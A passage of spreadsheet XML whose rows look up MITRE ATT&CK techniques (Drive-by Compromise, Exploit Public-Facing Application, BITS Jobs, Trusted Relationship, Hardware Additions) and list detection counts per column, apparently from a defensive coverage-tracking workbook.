      <c r="AT32" s="12">
        <v>0</v>
      </c>
      <c r="AU32" s="13">
        <v>0</v>
      </c>
      <c r="AV32" s="394">
        <v>0</v>
      </c>
      <c r="AW32" s="392">
        <v>0</v>
      </c>
      <c r="AX32" s="392">
        <v>0</v>
      </c>
      <c r="AY32" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ32" s="4">
        <v>0</v>
      </c>
      <c r="BA32" s="16">
        <v>0</v>
      </c>
      <c r="BB32" s="394">
        <v>0</v>
      </c>
      <c r="BC32" s="292">
        <v>0</v>
      </c>
      <c r="BD32" s="322">
        <v>0</v>
      </c>
      <c r="BE32" s="322" t="str">
        <f t="shared" si="8"/>
        <v>0 (0)</v>
      </c>
      <c r="BF32" s="12">
        <v>0</v>
      </c>
      <c r="BG32" s="13">
        <v>0</v>
      </c>
      <c r="BH32" s="394">
        <v>0</v>
      </c>
      <c r="BI32" s="292">
        <v>7</v>
      </c>
      <c r="BJ32" s="322">
        <v>7</v>
      </c>
      <c r="BK32" s="322" t="str">
        <f t="shared" si="9"/>
        <v>7 (7)</v>
      </c>
      <c r="BL32" s="12">
        <v>1</v>
      </c>
      <c r="BM32" s="13">
        <v>1</v>
      </c>
      <c r="BN32" s="394">
        <v>7</v>
      </c>
      <c r="BO32" s="292">
        <v>25</v>
      </c>
      <c r="BP32" s="322">
        <v>25</v>
      </c>
      <c r="BQ32" s="322" t="str">
        <f t="shared" si="10"/>
        <v>25 (25)</v>
      </c>
      <c r="BR32" s="12">
        <v>1</v>
      </c>
      <c r="BS32" s="12">
        <v>3</v>
      </c>
      <c r="BT32" s="13">
        <v>1</v>
      </c>
      <c r="BU32" s="394">
        <v>10</v>
      </c>
      <c r="BV32" s="292">
        <v>0</v>
      </c>
      <c r="BW32" s="322">
        <v>0</v>
      </c>
      <c r="BX32" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY32" s="12">
        <v>0</v>
      </c>
      <c r="BZ32" s="13">
        <v>0</v>
      </c>
      <c r="CA32" s="394">
        <v>0</v>
      </c>
      <c r="CB32" s="292">
        <v>13</v>
      </c>
      <c r="CC32" s="322">
        <v>8</v>
      </c>
      <c r="CD32" s="322" t="str">
        <f t="shared" si="12"/>
        <v>8 (13)</v>
      </c>
      <c r="CE32" s="12">
        <v>0</v>
      </c>
      <c r="CF32" s="12">
        <v>1</v>
      </c>
      <c r="CG32" s="13">
        <v>1</v>
      </c>
      <c r="CH32" s="394">
        <v>8</v>
      </c>
    </row>
    <row r="33" spans="1:86" ht="15" customHeight="1">
      <c r="A33" s="4">
        <f t="shared" si="13"/>
        <v>31</v>
      </c>
      <c r="B33" s="4" t="str">
        <f>IFERROR(VLOOKUP(A33,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1189</v>
      </c>
      <c r="C33" s="493" t="str">
        <f>IFERROR(VLOOKUP(B33,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Drive-by Compromise</v>
      </c>
      <c r="D33" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B33)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E33" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B33,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>5</v>
      </c>
      <c r="F33" s="579" t="str">
        <f t="shared" si="14"/>
        <v>2 (5)</v>
      </c>
      <c r="G33" s="292">
        <v>4</v>
      </c>
      <c r="H33" s="322">
        <v>3</v>
      </c>
      <c r="I33" s="322" t="str">
        <f t="shared" si="0"/>
        <v>3 (4)</v>
      </c>
      <c r="J33" s="12">
        <v>1</v>
      </c>
      <c r="K33" s="13">
        <v>0.5</v>
      </c>
      <c r="L33" s="394">
        <v>3</v>
      </c>
      <c r="M33" s="322">
        <v>1</v>
      </c>
      <c r="N33" s="322">
        <v>1</v>
      </c>
      <c r="O33" s="322" t="str">
        <f t="shared" si="1"/>
        <v>1 (1)</v>
      </c>
      <c r="P33" s="12">
        <v>1</v>
      </c>
      <c r="Q33" s="13">
        <v>0.5</v>
      </c>
      <c r="R33" s="394">
        <v>1</v>
      </c>
      <c r="S33" s="292">
        <v>5</v>
      </c>
      <c r="T33" s="322">
        <v>4</v>
      </c>
      <c r="U33" s="322" t="str">
        <f t="shared" si="2"/>
        <v>4 (5)</v>
      </c>
      <c r="V33" s="12">
        <v>2</v>
      </c>
      <c r="W33" s="13">
        <v>1</v>
      </c>
      <c r="X33" s="394">
        <v>4</v>
      </c>
      <c r="Y33" s="392">
        <v>542</v>
      </c>
      <c r="Z33" s="392">
        <v>10</v>
      </c>
      <c r="AA33" s="322" t="str">
        <f t="shared" si="3"/>
        <v>10 (542)</v>
      </c>
      <c r="AB33" s="392">
        <v>3</v>
      </c>
      <c r="AC33" s="16">
        <v>1</v>
      </c>
      <c r="AD33" s="394">
        <v>4</v>
      </c>
      <c r="AE33" s="392">
        <v>10</v>
      </c>
      <c r="AF33" s="392">
        <v>6</v>
      </c>
      <c r="AG33" s="322" t="str">
        <f t="shared" si="4"/>
        <v>6 (10)</v>
      </c>
      <c r="AH33" s="392">
        <v>4</v>
      </c>
      <c r="AI33" s="16">
        <v>1</v>
      </c>
      <c r="AJ33" s="394">
        <v>2</v>
      </c>
      <c r="AK33" s="392">
        <v>552</v>
      </c>
      <c r="AL33" s="392">
        <v>16</v>
      </c>
      <c r="AM33" s="322" t="str">
        <f t="shared" si="5"/>
        <v>16 (552)</v>
      </c>
      <c r="AN33" s="392">
        <v>7</v>
      </c>
      <c r="AO33" s="16">
        <v>1</v>
      </c>
      <c r="AP33" s="394">
        <v>4</v>
      </c>
      <c r="AQ33" s="292">
        <v>0</v>
      </c>
      <c r="AR33" s="322">
        <v>0</v>
      </c>
      <c r="AS33" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT33" s="12">
        <v>0</v>
      </c>
      <c r="AU33" s="13">
        <v>0</v>
      </c>
      <c r="AV33" s="394">
        <v>0</v>
      </c>
      <c r="AW33" s="392">
        <v>0</v>
      </c>
      <c r="AX33" s="392">
        <v>0</v>
      </c>
      <c r="AY33" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ33" s="4">
        <v>0</v>
      </c>
      <c r="BA33" s="16">
        <v>0</v>
      </c>
      <c r="BB33" s="394">
        <v>0</v>
      </c>
      <c r="BC33" s="292">
        <v>5</v>
      </c>
      <c r="BD33" s="322">
        <v>4</v>
      </c>
      <c r="BE33" s="322" t="str">
        <f t="shared" si="8"/>
        <v>4 (5)</v>
      </c>
      <c r="BF33" s="12">
        <v>2</v>
      </c>
      <c r="BG33" s="13">
        <v>1</v>
      </c>
      <c r="BH33" s="394">
        <v>4</v>
      </c>
      <c r="BI33" s="292">
        <v>3</v>
      </c>
      <c r="BJ33" s="322">
        <v>3</v>
      </c>
      <c r="BK33" s="322" t="str">
        <f t="shared" si="9"/>
        <v>3 (3)</v>
      </c>
      <c r="BL33" s="12">
        <v>1</v>
      </c>
      <c r="BM33" s="13">
        <v>0.5</v>
      </c>
      <c r="BN33" s="394">
        <v>3</v>
      </c>
      <c r="BO33" s="292">
        <v>12</v>
      </c>
      <c r="BP33" s="322">
        <v>12</v>
      </c>
      <c r="BQ33" s="322" t="str">
        <f t="shared" si="10"/>
        <v>12 (12)</v>
      </c>
      <c r="BR33" s="12">
        <v>1</v>
      </c>
      <c r="BS33" s="12">
        <v>3</v>
      </c>
      <c r="BT33" s="13">
        <v>1</v>
      </c>
      <c r="BU33" s="394">
        <v>5</v>
      </c>
      <c r="BV33" s="292">
        <v>0</v>
      </c>
      <c r="BW33" s="322">
        <v>0</v>
      </c>
      <c r="BX33" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY33" s="12">
        <v>0</v>
      </c>
      <c r="BZ33" s="13">
        <v>0</v>
      </c>
      <c r="CA33" s="394">
        <v>0</v>
      </c>
      <c r="CB33" s="292">
        <v>9</v>
      </c>
      <c r="CC33" s="322">
        <v>4</v>
      </c>
      <c r="CD33" s="322" t="str">
        <f t="shared" si="12"/>
        <v>4 (9)</v>
      </c>
      <c r="CE33" s="12">
        <v>0</v>
      </c>
      <c r="CF33" s="12">
        <v>1</v>
      </c>
      <c r="CG33" s="13">
        <v>1</v>
      </c>
      <c r="CH33" s="394">
        <v>4</v>
      </c>
    </row>
    <row r="34" spans="1:86" ht="15" customHeight="1">
      <c r="A34" s="4">
        <f t="shared" si="13"/>
        <v>32</v>
      </c>
      <c r="B34" s="4" t="str">
        <f>IFERROR(VLOOKUP(A34,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1190</v>
      </c>
      <c r="C34" s="493" t="str">
        <f>IFERROR(VLOOKUP(B34,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Exploit Public-Facing Application</v>
      </c>
      <c r="D34" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B34)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>5</v>
      </c>
      <c r="E34" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B34,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>130</v>
      </c>
      <c r="F34" s="579" t="str">
        <f t="shared" si="14"/>
        <v>5 (130)</v>
      </c>
      <c r="G34" s="292">
        <v>43</v>
      </c>
      <c r="H34" s="322">
        <v>41</v>
      </c>
      <c r="I34" s="322" t="str">
        <f t="shared" si="0"/>
        <v>41 (43)</v>
      </c>
      <c r="J34" s="12">
        <v>3</v>
      </c>
      <c r="K34" s="13">
        <v>0.8</v>
      </c>
      <c r="L34" s="394">
        <v>39</v>
      </c>
      <c r="M34" s="322">
        <v>216</v>
      </c>
      <c r="N34" s="322">
        <v>214</v>
      </c>
      <c r="O34" s="322" t="str">
        <f t="shared" si="1"/>
        <v>214 (216)</v>
      </c>
      <c r="P34" s="12">
        <v>18</v>
      </c>
      <c r="Q34" s="13">
        <v>1</v>
      </c>
      <c r="R34" s="394">
        <v>106</v>
      </c>
      <c r="S34" s="292">
        <v>259</v>
      </c>
      <c r="T34" s="322">
        <v>255</v>
      </c>
      <c r="U34" s="322" t="str">
        <f t="shared" si="2"/>
        <v>255 (259)</v>
      </c>
      <c r="V34" s="12">
        <v>21</v>
      </c>
      <c r="W34" s="13">
        <v>1</v>
      </c>
      <c r="X34" s="394">
        <v>114</v>
      </c>
      <c r="Y34" s="392">
        <v>395</v>
      </c>
      <c r="Z34" s="392">
        <v>384</v>
      </c>
      <c r="AA34" s="322" t="str">
        <f t="shared" si="3"/>
        <v>384 (395)</v>
      </c>
      <c r="AB34" s="392">
        <v>18</v>
      </c>
      <c r="AC34" s="16">
        <v>1</v>
      </c>
      <c r="AD34" s="394">
        <v>123</v>
      </c>
      <c r="AE34" s="392">
        <v>318</v>
      </c>
      <c r="AF34" s="392">
        <v>305</v>
      </c>
      <c r="AG34" s="322" t="str">
        <f t="shared" si="4"/>
        <v>305 (318)</v>
      </c>
      <c r="AH34" s="392">
        <v>25</v>
      </c>
      <c r="AI34" s="16">
        <v>1</v>
      </c>
      <c r="AJ34" s="394">
        <v>110</v>
      </c>
      <c r="AK34" s="392">
        <v>642</v>
      </c>
      <c r="AL34" s="392">
        <v>622</v>
      </c>
      <c r="AM34" s="322" t="str">
        <f t="shared" si="5"/>
        <v>622 (642)</v>
      </c>
      <c r="AN34" s="392">
        <v>40</v>
      </c>
      <c r="AO34" s="16">
        <v>1</v>
      </c>
      <c r="AP34" s="394">
        <v>123</v>
      </c>
      <c r="AQ34" s="292">
        <v>0</v>
      </c>
      <c r="AR34" s="322">
        <v>0</v>
      </c>
      <c r="AS34" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT34" s="12">
        <v>0</v>
      </c>
      <c r="AU34" s="13">
        <v>0</v>
      </c>
      <c r="AV34" s="394">
        <v>0</v>
      </c>
      <c r="AW34" s="392">
        <v>5</v>
      </c>
      <c r="AX34" s="392">
        <v>5</v>
      </c>
      <c r="AY34" s="322" t="str">
        <f t="shared" si="7"/>
        <v>5 (5)</v>
      </c>
      <c r="AZ34" s="4">
        <v>4</v>
      </c>
      <c r="BA34" s="16">
        <v>0.6</v>
      </c>
      <c r="BB34" s="394">
        <v>3</v>
      </c>
      <c r="BC34" s="292">
        <v>264</v>
      </c>
      <c r="BD34" s="322">
        <v>260</v>
      </c>
      <c r="BE34" s="322" t="str">
        <f t="shared" si="8"/>
        <v>260 (264)</v>
      </c>
      <c r="BF34" s="12">
        <v>25</v>
      </c>
      <c r="BG34" s="13">
        <v>1</v>
      </c>
      <c r="BH34" s="394">
        <v>114</v>
      </c>
      <c r="BI34" s="292">
        <v>202</v>
      </c>
      <c r="BJ34" s="322">
        <v>188</v>
      </c>
      <c r="BK34" s="322" t="str">
        <f t="shared" si="9"/>
        <v>188 (202)</v>
      </c>
      <c r="BL34" s="12">
        <v>3</v>
      </c>
      <c r="BM34" s="13">
        <v>1</v>
      </c>
      <c r="BN34" s="394">
        <v>114</v>
      </c>
      <c r="BO34" s="292">
        <v>370</v>
      </c>
      <c r="BP34" s="322">
        <v>356</v>
      </c>
      <c r="BQ34" s="322" t="str">
        <f t="shared" si="10"/>
        <v>356 (370)</v>
      </c>
      <c r="BR34" s="12">
        <v>3</v>
      </c>
      <c r="BS34" s="12">
        <v>2</v>
      </c>
      <c r="BT34" s="13">
        <v>1</v>
      </c>
      <c r="BU34" s="394">
        <v>123</v>
      </c>
      <c r="BV34" s="292">
        <v>45</v>
      </c>
      <c r="BW34" s="322">
        <v>29</v>
      </c>
      <c r="BX34" s="322" t="str">
        <f t="shared" si="11"/>
        <v>29 (45)</v>
      </c>
      <c r="BY34" s="12">
        <v>2</v>
      </c>
      <c r="BZ34" s="13">
        <v>0.4</v>
      </c>
      <c r="CA34" s="394">
        <v>28</v>
      </c>
      <c r="CB34" s="292">
        <v>197</v>
      </c>
      <c r="CC34" s="322">
        <v>121</v>
      </c>
      <c r="CD34" s="322" t="str">
        <f t="shared" si="12"/>
        <v>121 (197)</v>
      </c>
      <c r="CE34" s="12">
        <v>0</v>
      </c>
      <c r="CF34" s="12">
        <v>1</v>
      </c>
      <c r="CG34" s="13">
        <v>0.6</v>
      </c>
      <c r="CH34" s="394">
        <v>121</v>
      </c>
    </row>
    <row r="35" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A35" s="4">
        <f t="shared" si="13"/>
        <v>33</v>
      </c>
      <c r="B35" s="4" t="str">
        <f>IFERROR(VLOOKUP(A35,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1197</v>
      </c>
      <c r="C35" s="493" t="str">
        <f>IFERROR(VLOOKUP(B35,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>BITS Jobs</v>
      </c>
      <c r="D35" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B35)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E35" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B35,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>43</v>
      </c>
      <c r="F35" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (43)</v>
      </c>
      <c r="G35" s="292">
        <v>7</v>
      </c>
      <c r="H35" s="322">
        <v>3</v>
      </c>
      <c r="I35" s="322" t="str">
        <f t="shared" si="0"/>
        <v>3 (7)</v>
      </c>
      <c r="J35" s="12">
        <v>2</v>
      </c>
      <c r="K35" s="13">
        <v>1</v>
      </c>
      <c r="L35" s="394">
        <v>3</v>
      </c>
      <c r="M35" s="322">
        <v>28</v>
      </c>
      <c r="N35" s="322">
        <v>22</v>
      </c>
      <c r="O35" s="322" t="str">
        <f t="shared" si="1"/>
        <v>22 (28)</v>
      </c>
      <c r="P35" s="12">
        <v>4</v>
      </c>
      <c r="Q35" s="13">
        <v>1</v>
      </c>
      <c r="R35" s="394">
        <v>10</v>
      </c>
      <c r="S35" s="292">
        <v>35</v>
      </c>
      <c r="T35" s="322">
        <v>25</v>
      </c>
      <c r="U35" s="322" t="str">
        <f t="shared" si="2"/>
        <v>25 (35)</v>
      </c>
      <c r="V35" s="12">
        <v>6</v>
      </c>
      <c r="W35" s="13">
        <v>1</v>
      </c>
      <c r="X35" s="394">
        <v>11</v>
      </c>
      <c r="Y35" s="392">
        <v>45</v>
      </c>
      <c r="Z35" s="392">
        <v>35</v>
      </c>
      <c r="AA35" s="322" t="str">
        <f t="shared" si="3"/>
        <v>35 (45)</v>
      </c>
      <c r="AB35" s="392">
        <v>8</v>
      </c>
      <c r="AC35" s="16">
        <v>1</v>
      </c>
      <c r="AD35" s="394">
        <v>11</v>
      </c>
      <c r="AE35" s="392">
        <v>50</v>
      </c>
      <c r="AF35" s="392">
        <v>36</v>
      </c>
      <c r="AG35" s="322" t="str">
        <f t="shared" si="4"/>
        <v>36 (50)</v>
      </c>
      <c r="AH35" s="392">
        <v>9</v>
      </c>
      <c r="AI35" s="16">
        <v>1</v>
      </c>
      <c r="AJ35" s="394">
        <v>11</v>
      </c>
      <c r="AK35" s="392">
        <v>95</v>
      </c>
      <c r="AL35" s="392">
        <v>71</v>
      </c>
      <c r="AM35" s="322" t="str">
        <f t="shared" si="5"/>
        <v>71 (95)</v>
      </c>
      <c r="AN35" s="392">
        <v>17</v>
      </c>
      <c r="AO35" s="16">
        <v>1</v>
      </c>
      <c r="AP35" s="394">
        <v>12</v>
      </c>
      <c r="AQ35" s="292">
        <v>0</v>
      </c>
      <c r="AR35" s="322">
        <v>0</v>
      </c>
      <c r="AS35" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT35" s="12">
        <v>0</v>
      </c>
      <c r="AU35" s="13">
        <v>0</v>
      </c>
      <c r="AV35" s="394">
        <v>0</v>
      </c>
      <c r="AW35" s="392">
        <v>4</v>
      </c>
      <c r="AX35" s="392">
        <v>4</v>
      </c>
      <c r="AY35" s="322" t="str">
        <f t="shared" si="7"/>
        <v>4 (4)</v>
      </c>
      <c r="AZ35" s="4">
        <v>1</v>
      </c>
      <c r="BA35" s="16">
        <v>1</v>
      </c>
      <c r="BB35" s="394">
        <v>4</v>
      </c>
      <c r="BC35" s="292">
        <v>39</v>
      </c>
      <c r="BD35" s="322">
        <v>29</v>
      </c>
      <c r="BE35" s="322" t="str">
        <f t="shared" si="8"/>
        <v>29 (39)</v>
      </c>
      <c r="BF35" s="12">
        <v>7</v>
      </c>
      <c r="BG35" s="13">
        <v>1</v>
      </c>
      <c r="BH35" s="394">
        <v>11</v>
      </c>
      <c r="BI35" s="292">
        <v>5</v>
      </c>
      <c r="BJ35" s="322">
        <v>3</v>
      </c>
      <c r="BK35" s="322" t="str">
        <f t="shared" si="9"/>
        <v>3 (5)</v>
      </c>
      <c r="BL35" s="12">
        <v>2</v>
      </c>
      <c r="BM35" s="13">
        <v>1</v>
      </c>
      <c r="BN35" s="394">
        <v>2</v>
      </c>
      <c r="BO35" s="292">
        <v>32</v>
      </c>
      <c r="BP35" s="322">
        <v>26</v>
      </c>
      <c r="BQ35" s="322" t="str">
        <f t="shared" si="10"/>
        <v>26 (32)</v>
      </c>
      <c r="BR35" s="12">
        <v>2</v>
      </c>
      <c r="BS35" s="12">
        <v>7</v>
      </c>
      <c r="BT35" s="13">
        <v>1</v>
      </c>
      <c r="BU35" s="394">
        <v>25</v>
      </c>
      <c r="BV35" s="292">
        <v>0</v>
      </c>
      <c r="BW35" s="322">
        <v>0</v>
      </c>
      <c r="BX35" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY35" s="12">
        <v>0</v>
      </c>
      <c r="BZ35" s="13">
        <v>0</v>
      </c>
      <c r="CA35" s="394">
        <v>0</v>
      </c>
      <c r="CB35" s="292">
        <v>8</v>
      </c>
      <c r="CC35" s="322">
        <v>8</v>
      </c>
      <c r="CD35" s="322" t="str">
        <f t="shared" si="12"/>
        <v>8 (8)</v>
      </c>
      <c r="CE35" s="12">
        <v>0</v>
      </c>
      <c r="CF35" s="12">
        <v>1</v>
      </c>
      <c r="CG35" s="13">
        <v>1</v>
      </c>
      <c r="CH35" s="394">
        <v>8</v>
      </c>
    </row>
    <row r="36" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A36" s="4">
        <f t="shared" si="13"/>
        <v>34</v>
      </c>
      <c r="B36" s="4" t="str">
        <f>IFERROR(VLOOKUP(A36,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1199</v>
      </c>
      <c r="C36" s="493" t="str">
        <f>IFERROR(VLOOKUP(B36,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Trusted Relationship</v>
      </c>
      <c r="D36" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B36)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E36" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B36,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>18</v>
      </c>
      <c r="F36" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (18)</v>
      </c>
      <c r="G36" s="292">
        <v>6</v>
      </c>
      <c r="H36" s="322">
        <v>1</v>
      </c>
      <c r="I36" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (6)</v>
      </c>
      <c r="J36" s="12">
        <v>1</v>
      </c>
      <c r="K36" s="13">
        <v>1</v>
      </c>
      <c r="L36" s="394">
        <v>1</v>
      </c>
      <c r="M36" s="322">
        <v>0</v>
      </c>
      <c r="N36" s="322">
        <v>0</v>
      </c>
      <c r="O36" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P36" s="12">
        <v>0</v>
      </c>
      <c r="Q36" s="13">
        <v>0</v>
      </c>
      <c r="R36" s="394">
        <v>0</v>
      </c>
      <c r="S36" s="292">
        <v>6</v>
      </c>
      <c r="T36" s="322">
        <v>1</v>
      </c>
      <c r="U36" s="322" t="str">
        <f t="shared" si="2"/>
        <v>1 (6)</v>
      </c>
      <c r="V36" s="12">
        <v>1</v>
      </c>
      <c r="W36" s="13">
        <v>1</v>
      </c>
      <c r="X36" s="394">
        <v>1</v>
      </c>
      <c r="Y36" s="392">
        <v>6</v>
      </c>
      <c r="Z36" s="392">
        <v>1</v>
      </c>
      <c r="AA36" s="322" t="str">
        <f t="shared" si="3"/>
        <v>1 (6)</v>
      </c>
      <c r="AB36" s="392">
        <v>1</v>
      </c>
      <c r="AC36" s="16">
        <v>1</v>
      </c>
      <c r="AD36" s="394">
        <v>1</v>
      </c>
      <c r="AE36" s="392">
        <v>10</v>
      </c>
      <c r="AF36" s="392">
        <v>10</v>
      </c>
      <c r="AG36" s="322" t="str">
        <f t="shared" si="4"/>
        <v>10 (10)</v>
      </c>
      <c r="AH36" s="392">
        <v>7</v>
      </c>
      <c r="AI36" s="16">
        <v>1</v>
      </c>
      <c r="AJ36" s="394">
        <v>5</v>
      </c>
      <c r="AK36" s="392">
        <v>16</v>
      </c>
      <c r="AL36" s="392">
        <v>11</v>
      </c>
      <c r="AM36" s="322" t="str">
        <f t="shared" si="5"/>
        <v>11 (16)</v>
      </c>
      <c r="AN36" s="392">
        <v>8</v>
      </c>
      <c r="AO36" s="16">
        <v>1</v>
      </c>
      <c r="AP36" s="394">
        <v>5</v>
      </c>
      <c r="AQ36" s="292">
        <v>0</v>
      </c>
      <c r="AR36" s="322">
        <v>0</v>
      </c>
      <c r="AS36" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT36" s="12">
        <v>0</v>
      </c>
      <c r="AU36" s="13">
        <v>0</v>
      </c>
      <c r="AV36" s="394">
        <v>0</v>
      </c>
      <c r="AW36" s="392">
        <v>0</v>
      </c>
      <c r="AX36" s="392">
        <v>0</v>
      </c>
      <c r="AY36" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ36" s="4">
        <v>0</v>
      </c>
      <c r="BA36" s="16">
        <v>0</v>
      </c>
      <c r="BB36" s="394">
        <v>0</v>
      </c>
      <c r="BC36" s="292">
        <v>6</v>
      </c>
      <c r="BD36" s="322">
        <v>1</v>
      </c>
      <c r="BE36" s="322" t="str">
        <f t="shared" si="8"/>
        <v>1 (6)</v>
      </c>
      <c r="BF36" s="12">
        <v>1</v>
      </c>
      <c r="BG36" s="13">
        <v>1</v>
      </c>
      <c r="BH36" s="394">
        <v>1</v>
      </c>
      <c r="BI36" s="292">
        <v>1</v>
      </c>
      <c r="BJ36" s="322">
        <v>1</v>
      </c>
      <c r="BK36" s="322" t="str">
        <f t="shared" si="9"/>
        <v>1 (1)</v>
      </c>
      <c r="BL36" s="12">
        <v>1</v>
      </c>
      <c r="BM36" s="13">
        <v>1</v>
      </c>
      <c r="BN36" s="394">
        <v>1</v>
      </c>
      <c r="BO36" s="292">
        <v>11</v>
      </c>
      <c r="BP36" s="322">
        <v>11</v>
      </c>
      <c r="BQ36" s="322" t="str">
        <f t="shared" si="10"/>
        <v>11 (11)</v>
      </c>
      <c r="BR36" s="12">
        <v>1</v>
      </c>
      <c r="BS36" s="12">
        <v>4</v>
      </c>
      <c r="BT36" s="13">
        <v>1</v>
      </c>
      <c r="BU36" s="394">
        <v>10</v>
      </c>
      <c r="BV36" s="292">
        <v>0</v>
      </c>
      <c r="BW36" s="322">
        <v>0</v>
      </c>
      <c r="BX36" s="322" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY36" s="12">
        <v>0</v>
      </c>
      <c r="BZ36" s="13">
        <v>0</v>
      </c>
      <c r="CA36" s="394">
        <v>0</v>
      </c>
      <c r="CB36" s="292">
        <v>0</v>
      </c>
      <c r="CC36" s="322">
        <v>0</v>
      </c>
      <c r="CD36" s="322" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE36" s="12">
        <v>0</v>
      </c>
      <c r="CF36" s="12">
        <v>0</v>
      </c>
      <c r="CG36" s="13">
        <v>0</v>
      </c>
      <c r="CH36" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="37" spans="1:86" s="5" customFormat="1" ht="15" customHeight="1">
      <c r="A37" s="4">
        <f t="shared" si="13"/>
        <v>35</v>
      </c>
      <c r="B37" s="4" t="str">
        <f>IFERROR(VLOOKUP(A37,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1200</v>
      </c>
      <c r="C37" s="493" t="str">
        <f>IFERROR(VLOOKUP(B37,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Hardware Additions</v>
      </c>
      <c r="D37" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B37)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E37" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B37,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>3</v>
      </c>
      <c r="F37" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (3)</v>
      </c>
      <c r="G37" s="292">
        <v>6</v>
      </c>
      <c r="H37" s="322">
        <v>1</v>
      </c>
      <c r="I37" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (6)</v>
      </c>
      <c r="J37" s="12">
        <v>1</v>
      </c>
      <c r="K37" s="13">
        <v>1</v>
      </c>
      <c r="L37" s="394">
        <v>1</v>
      </c>
      <c r="M37" s="322">
        <v>0</v>
      </c>
      <c r="N37" s="322">
        <v>0</v>
      </c>
      <c r="O37" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P37" s="12">
        <v>0</v>
      </c>
      <c r="Q37" s="13">
        <v>0</v>
      </c>
      <c r="R37" s="394">
        <v>0</v>
      </c>
      <c r="S37" s="292">
        <v>6</v>
      </c>
      <c r="T37" s="322">
        <v>1</v>
      </c>
      <c r="U37" s="322" t="str">
        <f t="shared" si="2"/>
        <v>1 (6)</v>
      </c>
      <c r="V37" s="12">
        <v>1</v>
      </c>
      <c r="W37" s="13">
        <v>1</v>
      </c>
      <c r="X37" s="394">
        <v>1</v>
      </c>
      <c r="Y37" s="392">
        <v>7</v>
      </c>
      <c r="Z37" s="392">
        <v>2</v>
      </c>
      <c r="AA37" s="322" t="str">
        <f t="shared" si="3"/>
        <v>2 (7)</v>
      </c>
      <c r="AB37" s="392">
        <v>2</v>
      </c>
      <c r="AC37" s="16">
        <v>1</v>
      </c>
      <c r="AD37" s="394">
        <v>1</v>
      </c>
      <c r="AE37" s="392">
        <v>11</v>
      </c>
      <c r="AF37" s="392">
        <v>4</v>
      </c>
